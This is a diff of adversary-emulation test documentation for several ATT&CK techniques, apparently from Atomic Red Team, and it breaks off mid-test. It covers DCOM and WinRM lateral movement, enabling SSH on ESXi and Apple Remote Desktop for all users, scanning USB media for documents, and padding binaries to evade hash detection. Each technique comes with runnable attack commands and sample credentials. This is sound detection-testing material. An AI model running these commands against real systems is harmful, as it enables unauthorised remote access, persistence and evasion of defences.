+**auto_generated_guid:** `d41aaab5-bdfe-431d-a3d5-c29e9136ff46`

-**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Remote computer to receive the copy and execute the file | string | output.txt|
 | command_to_execute | Command to execute for output. | string | hostname|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
 ```

-
-
-
-
-
-<br/>
@@ -1,27 +1,24 @@
 # T1021.003 - Remote Services: Distributed Component Object Model
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/003)
-<blockquote>

-Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
+## Description from ATT&CK

-The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
+> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
+> 
+> The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
+> 
+> Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
+> 
+> Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)

-Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
-
-Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1021/003)

 ## Atomic Tests

- [Atomic Test #1 - PowerShell Lateral Movement using MMC20](#atomic-test-1---powershell-lateral-movement-using-mmc20)
+- [Atomic Test #1: PowerShell Lateral Movement using MMC20](#atomic-test-1-powershell-lateral-movement-using-mmc20)
+- [Atomic Test #2: PowerShell Lateral Movement Using Excel Application Object](#atomic-test-2-powershell-lateral-movement-using-excel-application-object)

- [Atomic Test #2 - PowerShell Lateral Movement Using Excel Application Object](#atomic-test-2---powershell-lateral-movement-using-excel-application-object)
+### Atomic Test #1: PowerShell Lateral Movement using MMC20

-
-<br/>
-
-## Atomic Test #1 - PowerShell Lateral Movement using MMC20
 Powershell lateral movement using the mmc20 application com object.

 Reference:
@@ -32,35 +29,22 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `6dc74eb1-c9d6-4c53-b3b5-6f50ae339673`

-**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Name of Computer | string | localhost|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
 ```

+### Atomic Test #2: PowerShell Lateral Movement Using Excel Application Object

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - PowerShell Lateral Movement Using Excel Application Object
 Powershell lateral movement using the Excel COM objects.

 Reference:
@@ -71,22 +55,16 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `505f24be-1c11-4694-b614-e01ae1cd2570`

-**auto_generated_guid:** 505f24be-1c11-4694-b614-e01ae1cd2570
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Hostname or IP | string | localhost|
 | user | Name of user | string | admin|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
@@ -94,16 +72,18 @@ $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Appli
 $com.ActivateMicrosoftApp("5")
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Microsoft Excel must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 try {
  New-Object -COMObject "Excel.Application" | Out-Null
@@ -111,12 +91,10 @@ try {
  exit 0
 } catch { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
 ```

-
-
-
-<br/>
@@ -1,44 +1,35 @@
 # T1021.004 - Remote Services: SSH
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/004)
-<blockquote>

-Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
+## Description from ATT&CK

-SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)).
+> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
+> 
+> SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)).

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1021/004)

 ## Atomic Tests

- [Atomic Test #1 - ESXi - Enable SSH via PowerCLI](#atomic-test-1---esxi---enable-ssh-via-powercli)
+- [Atomic Test #1: ESXi - Enable SSH via PowerCLI](#atomic-test-1-esxi---enable-ssh-via-powercli)
+- [Atomic Test #2: ESXi - Enable SSH via VIM-CMD](#atomic-test-2-esxi---enable-ssh-via-vim-cmd)

- [Atomic Test #2 - ESXi - Enable SSH via VIM-CMD](#atomic-test-2---esxi---enable-ssh-via-vim-cmd)
+### Atomic Test #1: ESXi - Enable SSH via PowerCLI

-
-<br/>
-
-## Atomic Test #1 - ESXi - Enable SSH via PowerCLI
 An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `8f6c14d1-f13d-4616-b7fc-98cc69fe56ec`

-**auto_generated_guid:** 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | vm_host | Specify the host name of the ESXi Server | string | atomic.local|
 | vm_user | Specify the privilege user account on ESXi Server | string | root|
 | vm_pass | Specify the privilege user password on ESXi Server | string | pass|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
@@ -46,47 +37,42 @@ Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
 Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
 Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
 Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Stop-VMHostService -Confirm:$false
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Check if VMWARE PowerCLI PowerShell Module is installed.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 $RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
 if (-not $RequiredModule) {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Install-Module -Name VMware.PowerCLI
 ```

+### Atomic Test #2: ESXi - Enable SSH via VIM-CMD

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - ESXi - Enable SSH via VIM-CMD
 An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
 [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)

 **Supported Platforms:** Windows

+**auto_generated_guid:** `280812c8-4dae-43e9-a74e-1d08ab997c0e`

-**auto_generated_guid:** 280812c8-4dae-43e9-a74e-1d08ab997c0e
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | vm_host | Specify the host name or IP of the ESXi server. | string | atomic.local|
@@ -94,34 +80,32 @@ An adversary enables SSH on an ESXi host to maintain persistence and creeate ano
 | vm_pass | Specify the privileged user's password. | string | password|
 | plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Check if we have plink
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
 ```

-
-
-
-<br/>
@@ -1,23 +1,21 @@
 # T1021.005 - Remote Services:VNC
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/005)
-<blockquote>

-Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
+## Description from ATT&CK

-VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
+> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
+> 
+> VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
+> 
+> Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)

-Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1021/005)

 ## Atomic Tests

- [Atomic Test #1 - Enable Apple Remote Desktop Agent](#atomic-test-1---enable-apple-remote-desktop-agent)
+- [Atomic Test #1: Enable Apple Remote Desktop Agent](#atomic-test-1-enable-apple-remote-desktop-agent)

+### Atomic Test #1: Enable Apple Remote Desktop Agent

-<br/>
-
-## Atomic Test #1 - Enable Apple Remote Desktop Agent
 ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer. 
 Adversaries can abuse ARD to gain remote code execution and perform lateral movement.

@@ -25,28 +23,16 @@ References:  https://www.mandiant.com/resources/blog/leveraging-apple-remote-des

 **Supported Platforms:** macOS

+**auto_generated_guid:** `8a930abe-841c-4d4f-a877-72e9fe90b9ea`

-**auto_generated_guid:** 8a930abe-841c-4d4f-a877-72e9fe90b9ea
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -quiet
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate -stop -configure -privs -none -quiet
 ```
-
-
-
-
-
-<br/>
@@ -1,143 +1,110 @@
 # T1021.006 - Remote Services: Windows Remote Management
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/006)
-<blockquote>

-Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
+## Description from ATT&CK

-WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)
+> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
+> 
+> WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1021/006)

 ## Atomic Tests

- [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management)
+- [Atomic Test #1: Enable Windows Remote Management](#atomic-test-1-enable-windows-remote-management)
+- [Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2-remote-code-execution-with-ps-credentials-using-invoke-command)
+- [Atomic Test #3: WinRM Access with Evil-WinRM](#atomic-test-3-winrm-access-with-evil-winrm)

- [Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2---remote-code-execution-with-ps-credentials-using-invoke-command)
+### Atomic Test #1: Enable Windows Remote Management

- [Atomic Test #3 - WinRM Access with Evil-WinRM](#atomic-test-3---winrm-access-with-evil-winrm)
-
-
-<br/>
-
-## Atomic Test #1 - Enable Windows Remote Management
 Powershell Enable WinRM

 Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `9059e8de-3d7d-4954-a322-46161880b9cf`

-**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 Enable-PSRemoting -Force
 ```

+### Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command
 Simulate lateral movement with PowerShell Remoting on the local host. 
 Upon successful execution, PowerShell will execute `whoami` using `Invoke-Command`, targeting the 
 local machine as remote target.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `5295bd61-bd7e-4744-9d52-85962a4cf2d6`

-**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 Enable-PSRemoting -Force
 Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Disable-PSRemoting -Force
 ```
+### Atomic Test #3: WinRM Access with Evil-WinRM

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - WinRM Access with Evil-WinRM
 An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled

 **Supported Platforms:** Windows

+**auto_generated_guid:** `efe86d95-44c4-4509-ae42-7bfd9d1f5b3d`

-**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | Username | string | Domain&#92;Administrator|
 | destination_address | Remote Host IP or Hostname | string | Target|
 | password | Password | string | P@ssw0rd1|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have Ruby Installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 try {if (ruby -v) {exit 0} else {exit 1}} catch {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
 Invoke-WebRequest  -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe" https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe
 $file1= "PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe"
 Start-Process $file1 /S;
 ```
+
 ##### Description: Computer must have Evil-WinRM installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 try {if (evil-winrm -h) {exit 0} else {exit 1}} catch {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 gem install evil-winrm
 ```

-
-
-
-<br/>
@@ -1,21 +1,19 @@
 # T1025 - Data from Removable Media
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1025)
-<blockquote>

-Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. 
+## Description from ATT&CK

-Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.
+> Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
+> 
+> Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1025)

 ## Atomic Tests

- [Atomic Test #1 - Identify Documents on USB and Removable Media via PowerShell](#atomic-test-1---identify-documents-on-usb-and-removable-media-via-powershell)
+- [Atomic Test #1: Identify Documents on USB and Removable Media via PowerShell](#atomic-test-1-identify-documents-on-usb-and-removable-media-via-powershell)

+### Atomic Test #1: Identify Documents on USB and Removable Media via PowerShell

-<br/>
-
-## Atomic Test #1 - Identify Documents on USB and Removable Media via PowerShell
 This test simulates an attack where PowerShell is used to detect connected USB or other removable storage devices and gather a list of specific document files 
 (e.g., .docx, .xls, .txt, .pdf). The command works by first identifying removable drives on the system and then recursively searching through each one for files 
 matching the targeted extensions. If no removable drives are present, the script will return a message stating that no media is detected. This behavior mimics 
@@ -23,24 +21,11 @@ how adversaries might scan for sensitive documents on removable devices for exfi

 **Supported Platforms:** Windows

+**auto_generated_guid:** `0b29f7e3-a050-44b7-bf05-9fb86af1ec2e`

-**auto_generated_guid:** 0b29f7e3-a050-44b7-bf05-9fb86af1ec2e
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 powershell.exe -c "Get-Volume | Where-Object {$_.DriveType -eq 'Removable'} | ForEach-Object { Get-ChildItem -Path ($_.DriveLetter + ':\*') -Recurse -Include '*.doc*','*.xls*','*.txt','*.pdf' -ErrorAction SilentlyContinue | ForEach-Object {Write-Output $_.FullName} } ; if (-not (Get-Volume | Where-Object {$_.DriveType -eq 'Removable'})) { Write-Output 'No removable media.' }"
 ```

-
-
-
-
-
-<br/>
@@ -1,44 +1,35 @@
 # T1027.001 - Obfuscated Files or Information: Binary Padding
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/001)
-<blockquote>

-Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
+## Description from ATT&CK

-Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) 
+> Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
+> 
+> Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)

-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1027/001)

 ## Atomic Tests

- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
+- [Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1-pad-binary-to-change-hash---linuxmacos-dd)
+- [Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS](#atomic-test-2-pad-binary-to-change-hash-using-truncate-command---linuxmacos)

- [Atomic Test #2 - Pad Binary to Change Hash using truncate command - Linux/macOS](#atomic-test-2---pad-binary-to-change-hash-using-truncate-command---linuxmacos)
+### Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd

-
-<br/>
-
-## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
 Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.

 Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `ffe2346c-abd5-4b45-a713-bf5f1ebd573a`

-**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_pad | Path of binary to be padded | path | /tmp/evil-binary|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
@@ -46,76 +37,69 @@ dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
 dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 rm #{file_to_pad}
 ```

+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: The binary must exist on disk at specified location (#{file_to_pad})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 cp /bin/ls #{file_to_pad}
 ```

+### Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Pad Binary to Change Hash using truncate command - Linux/macOS
 Uses truncate to add a byte to the binary to change the hash.

 Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `e22a9e89-69c7-410f-a473-e6c212cd2292`

-**auto_generated_guid:** e22a9e89-69c7-410f-a473-e6c212cd2292
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_pad | Path of binary to be padded | path | /tmp/evil-binary|

-
-#### Attack Commands: Run with `sh`! 
-
